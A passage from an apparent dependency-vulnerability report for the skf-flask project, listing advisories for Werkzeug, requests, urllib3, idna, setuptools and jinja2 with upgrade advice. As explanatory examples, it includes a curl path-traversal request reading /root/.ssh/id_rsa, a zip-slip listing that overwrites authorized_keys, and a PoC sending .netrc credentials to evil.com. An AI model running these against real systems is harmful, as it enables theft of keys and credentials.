Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st
is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public
route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e
is the URL encoded version of .
(dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip
.
One way to achieve this is by using a malicious zip
archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip
archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/
overwriting the authorized_keys
file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade Werkzeug
to version 3.0.6 or higher.
References
medium severity
- Vulnerable module: idna
- Introduced through: requests@2.25.1, kubernetes@12.0.1 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › requests@2.25.1 › idna@2.10Remediation: Upgrade to requests@2.32.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests@2.25.1 › idna@2.10
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › requests@2.25.1 › idna@2.10Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests-oauthlib@2.0.0 › requests@2.25.1 › idna@2.10
Overview
Affected versions of this package are vulnerable to Resource Exhaustion via the idna.encode
function. An attacker can consume significant resources and potentially cause a denial-of-service by supplying specially crafted arguments to this function.
Note: This is triggered by arbitrarily large inputs that would not occur in normal usage but may be passed to the library assuming there is no preliminary input validation by the higher-level application.
Remediation
Upgrade idna
to version 3.7 or higher.
References
medium severity
- Vulnerable module: requests
- Introduced through: requests@2.25.1, kubernetes@12.0.1 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › requests@2.25.1Remediation: Upgrade to requests@2.31.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests@2.25.1
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › requests@2.25.1Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests-oauthlib@2.0.0 › requests@2.25.1
Overview
Affected versions of this package are vulnerable to Information Exposure by leaking Proxy-Authorization
headers to destination servers during redirects to an HTTPS origin. This is a result of how rebuild_proxies
is used to recompute and reattach the Proxy-Authorization
header to requests when redirected.
NOTE: This behavior has only been observed to affect proxied requests when credentials are supplied in the URL user information component (e.g. https://username:password@proxy:8080
), and only when redirecting to HTTPS:
HTTP → HTTPS: leak
HTTPS → HTTP: no leak
HTTPS → HTTPS: leak
HTTP → HTTP: no leak
For HTTP connections sent through the proxy, the proxy will identify the header in the request and remove it prior to forwarding to the destination server. However when sent over HTTPS, the Proxy-Authorization
header must be sent in the CONNECT
request as the proxy has no visibility into further tunneled requests. This results in Requests forwarding the header to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate those credentials.
Workaround
This vulnerability can be avoided by setting allow_redirects
to False
on all calls through Requests top-level APIs, and then capturing the 3xx response codes to make a new request to the redirect destination.
Remediation
Upgrade requests
to version 2.31.0 or higher.
References
medium severity
- Vulnerable module: urllib3
- Introduced through: elastic-apm@6.0.0, requests@2.25.1 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › elastic-apm@6.0.0 › urllib3@2.0.7Remediation: Upgrade to elastic-apm@6.0.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › requests@2.25.1 › urllib3@2.0.7Remediation: Upgrade to requests@2.32.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › urllib3@2.0.7Remediation: Upgrade to kubernetes@28.1.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › selenium@3.141.0 › urllib3@2.0.7Remediation: Upgrade to selenium@3.141.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests@2.25.1 › urllib3@2.0.7
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › requests@2.25.1 › urllib3@2.0.7Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests-oauthlib@2.0.0 › requests@2.25.1 › urllib3@2.0.7
Overview
urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.
Affected versions of this package are vulnerable to Improper Removal of Sensitive Information Before Storage or Transfer due to the improper handling of the Proxy-Authorization
header during cross-origin redirects when ProxyManager
is not in use. When the conditions below are met, including non-recommended configurations, the contents of this header can be sent in an automatic HTTP redirect.
Notes:
To be vulnerable, the application must be doing all of the following:
Setting the
Proxy-Authorization
header without using urllib3's built-in proxy support.Not disabling HTTP redirects (e.g. with
redirects=False
)Either not using an HTTPS origin server, or having a proxy or target origin that redirects to a malicious origin.
Workarounds
Using the
Proxy-Authorization
header with urllib3'sProxyManager
.Disabling HTTP redirects using
redirects=False
when sending requests.Not using the
Proxy-Authorization
header.
Remediation
Upgrade urllib3
to version 1.26.19, 2.2.2 or higher.
References
medium severity
- Vulnerable module: urllib3
- Introduced through: elastic-apm@6.0.0, requests@2.25.1 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › elastic-apm@6.0.0 › urllib3@2.0.7Remediation: Upgrade to elastic-apm@6.0.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › requests@2.25.1 › urllib3@2.0.7Remediation: Upgrade to requests@2.32.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › urllib3@2.0.7Remediation: Upgrade to kubernetes@28.1.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › selenium@3.141.0 › urllib3@2.0.7Remediation: Upgrade to selenium@3.141.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests@2.25.1 › urllib3@2.0.7
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › requests@2.25.1 › urllib3@2.0.7Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests-oauthlib@2.0.0 › requests@2.25.1 › urllib3@2.0.7
Overview
urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.
Affected versions of this package are vulnerable to Open Redirect due to the retries
parameter being ignored during PoolManager
instantiation. An attacker can access unintended resources or endpoints by leveraging automatic redirects when the application expects redirects to be disabled at the connection pool level.
Note:
requests
and botocore
users are not affected.
Workaround
This can be mitigated by disabling redirects at the request()
level instead of the PoolManager()
level.
Remediation
Upgrade urllib3
to version 2.5.0 or higher.
References
medium severity
- Vulnerable module: setuptools
- Introduced through: google-auth@1.28.0, gunicorn@20.0.4 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-auth@1.28.0 › setuptools@40.5.0Remediation: Upgrade to google-auth@2.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › gunicorn@20.0.4 › setuptools@40.5.0Remediation: Upgrade to gunicorn@20.1.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › setuptools@40.5.0Remediation: Upgrade to kubernetes@27.2.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-auth-httplib2@0.1.0 › google-auth@1.28.0 › setuptools@40.5.0
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-auth@1.28.0 › setuptools@40.5.0Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › google-auth@1.28.0 › setuptools@40.5.0Remediation: Upgrade to kubernetes@28.1.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › google-auth@1.28.0 › setuptools@40.5.0Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-auth-httplib2@0.1.0 › google-auth@1.28.0 › setuptools@40.5.0
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via crafted HTML package or custom PackageIndex
page.
Note:
Only a small portion of the user base is impacted by this flaw. Setuptools maintainers pointed out that package_index
is deprecated (not formally, but “in spirit”) and the vulnerability isn't reachable through standard, recommended workflows.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade setuptools
to version 65.5.1 or higher.
References
medium severity
- Vulnerable module: requests
- Introduced through: requests@2.25.1, kubernetes@12.0.1 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › requests@2.25.1Remediation: Upgrade to requests@2.32.4.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests@2.25.1
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › requests@2.25.1Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests-oauthlib@2.0.0 › requests@2.25.1
Overview
Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data due to incorrect URL processing. An attacker could craft a malicious URL that, when processed by the library, tricks it into sending the victim's .netrc
credentials to a server controlled by the attacker.
Note:
This is only exploitable if the .netrc
file contains an entry for the hostname that the attacker includes in the crafted URL's "intended" part (e.g., example.com
in http://example.com:@evil.com/
).
PoC
requests.get('http://example.com:@evil.com/')
Remediation
Upgrade requests
to version 2.32.4 or higher.
References
medium severity
- Vulnerable module: requests
- Introduced through: requests@2.25.1, kubernetes@12.0.1 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › requests@2.25.1Remediation: Upgrade to requests@2.32.2.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests@2.25.1
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › requests@2.25.1Remediation: Upgrade to google-api-python-client@2.109.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests-oauthlib@2.0.0 › requests@2.25.1
Overview
Affected versions of this package are vulnerable to Always-Incorrect Control Flow Implementation when making requests through a Requests Session
. An attacker can bypass certificate verification by making the first request with verify=False
, causing all subsequent requests to ignore certificate verification regardless of changes to the verify
value.
Notes:
For requests <2.32.0, avoid setting
verify=False
for the first request to a host while using a Requests Session.For requests <2.32.0, call
close()
on Session objects to clear existing connections ifverify=False
is used.This vulnerability was initially fixed in version 2.32.0, which was yanked. Therefore, the next available fixed version is 2.32.2.
Remediation
Upgrade requests
to version 2.32.2 or higher.
References
medium severity
- Vulnerable module: jinja2
- Introduced through: jinja2@2.11.3, flask@1.1.2 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › jinja2@2.11.3Remediation: Upgrade to jinja2@3.1.3.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask@1.1.2.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-bcrypt@0.7.1 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-bcrypt@0.7.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cli@0.4.0 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-cli@0.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-cors@3.0.10.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-sqlalchemy@2.5.1 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-sqlalchemy@2.5.1.
Overview
Jinja2 is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the xmlattr
filter, when using keys containing spaces in an application accepts keys as user input. An attacker can inject arbitrary HTML attributes into the rendered HTML template, bypassing the auto-escaping mechanism, which may lead to the execution of untrusted scripts in the context of the user's browser session.
Note
Accepting keys as user input is not common or a particularly intended use case of the xmlattr
filter, and an application doing so should already be verifying what keys are provided regardless of this fix.
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <
can be coded as <
; and >
can be coded as >
; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <
and >
as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
Type | Origin | Description |
---|---|---|
Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?
,&
,/
,<
,>
and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade Jinja2
to version 3.1.3 or higher.
References
medium severity
- Vulnerable module: jinja2
- Introduced through: jinja2@2.11.3, flask@1.1.2 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › jinja2@2.11.3Remediation: Upgrade to jinja2@3.1.4.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask@1.1.2.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-bcrypt@0.7.1 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-bcrypt@0.7.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cli@0.4.0 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-cli@0.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-cors@3.0.10.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-sqlalchemy@2.5.1 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-sqlalchemy@2.5.1.
Overview
Jinja2 is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) through the xmlattr
filter. An attacker can manipulate the output of web pages by injecting additional attributes into elements, potentially leading to unauthorized actions or information disclosure.
Note: This vulnerability derives from an improper fix of CVE-2024-22195, which only addressed spaces but not other characters.
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <
can be coded as <
; and >
can be coded as >
; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <
and >
as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
Type | Origin | Description |
---|---|---|
Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?
,&
,/
,<
,>
and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade Jinja2
to version 3.1.4 or higher.
References
medium severity
- Vulnerable module: jinja2
- Introduced through: jinja2@2.11.3, flask@1.1.2 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › jinja2@2.11.3Remediation: Upgrade to jinja2@3.1.5.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask@1.1.2.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-bcrypt@0.7.1 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-bcrypt@0.7.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cli@0.4.0 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-cli@0.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-cors@3.0.10.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-sqlalchemy@2.5.1 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-sqlalchemy@2.5.1.
Overview
Affected versions of this package are vulnerable to Improper Neutralization when importing a macro in a template whose filename is also a template. This will result in a SyntaxError: f-string: invalid syntax
error message because the filename is not properly escaped, indicating that it is being treated as a format string.
Note: This is only exploitable when the attacker controls both the content and filename of a template and the application executes untrusted templates.
Remediation
Upgrade jinja2
to version 3.1.5 or higher.
References
medium severity
- Vulnerable module: jinja2
- Introduced through: jinja2@2.11.3, flask@1.1.2 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › jinja2@2.11.3Remediation: Upgrade to jinja2@3.1.5.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask@1.1.2.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-bcrypt@0.7.1 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-bcrypt@0.7.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cli@0.4.0 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-cli@0.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-cors@3.0.10.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-sqlalchemy@2.5.1 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-sqlalchemy@2.5.1.
Overview
Affected versions of this package are vulnerable to Template Injection when an attacker controls the content of a template. This is due to an oversight in the sandboxed environment's method detection when using a stored reference to a malicious string's format
method, which can then be executed through a filter.
Note: This is only exploitable through custom filters in an application.
Remediation
Upgrade jinja2
to version 3.1.5 or higher.
References
medium severity
- Vulnerable module: jinja2
- Introduced through: jinja2@2.11.3, flask@1.1.2 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › jinja2@2.11.3Remediation: Upgrade to jinja2@3.1.6.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask@1.1.2.
-
